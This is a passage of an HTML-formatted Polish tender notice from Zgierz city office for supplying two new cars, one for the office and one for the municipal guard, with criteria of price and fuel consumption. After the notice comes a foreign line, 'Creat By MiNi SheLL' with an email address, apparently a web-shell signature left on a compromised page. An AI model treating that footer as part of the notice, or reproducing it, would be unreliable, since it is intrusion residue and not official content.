żądanie drugiej, zobowiązana jest niezwłocznie potwierdzić fakt ich otrzymania; b) w przypadku zastosowania przez Wykonawcę elektronicznej formy porozumiewania się z Zamawiającym - zaleca się telefoniczne uprzedzenie Zamawiającego o takim zamiarze na numer: (42) 71 43 200.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa samochodu osobowego na potrzeby Urzędu Miasta Zgierza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa fabrycznie nowego samochodu osobowego na potrzeby Urzędu Miasta Zgierza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Średnie zużycie paliwa - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa samochodu specjalnego na potrzeby Straży Miejskiej w Zgierzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa fabrycznie nowego samochodu specjalnego na potrzeby Straży Miejskiej w Zgierzu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.11.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 100.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Średnie zużycie paliwa - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com